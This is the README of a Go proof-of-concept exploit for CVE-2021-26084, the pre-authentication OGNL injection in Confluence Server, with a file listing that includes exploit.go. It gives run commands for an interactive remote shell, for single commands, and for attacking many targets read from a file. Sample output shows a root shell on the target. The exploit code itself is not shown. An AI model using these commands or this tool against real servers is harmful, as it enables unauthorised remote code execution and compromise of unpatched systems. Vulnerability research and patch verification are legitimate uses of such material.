CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)# CVE-2021-26084
Proof of concept for CVE-2021-26084.
Confluence Server Webwork OGNL injection (Pre-Auth RCE)
## Disclaimer
This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.
## Command Limiations
Due to the payload, it is not possible to pass some characters. The list below is what I've found during my testing.
* Double quotations `"`
* Vertical bar `|`
## Interactive Shell
```
go run exploit.go -t <target> -i
```
Example
```sh
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
```
* **Only works on a single target**
* Type `exit` to exit the interactive shell
* Notice shows if possible Windows machine
## Single Target
```
go run exploit.go -t <target> -c <command>
```
## Multiple Targets
```
go run exploit.go -f <file> -c <command>
```
## Build
```
go mod download
go build exploit.go
```
[4.0K] /data/pocs/ffe86179d2d778681448b4ff9d52ddff807db720
├── [4.7K] exploit.go
├── [ 215] go.mod
├── [7.3K] go.sum
└── [1.2K] README.md
0 directories, 4 files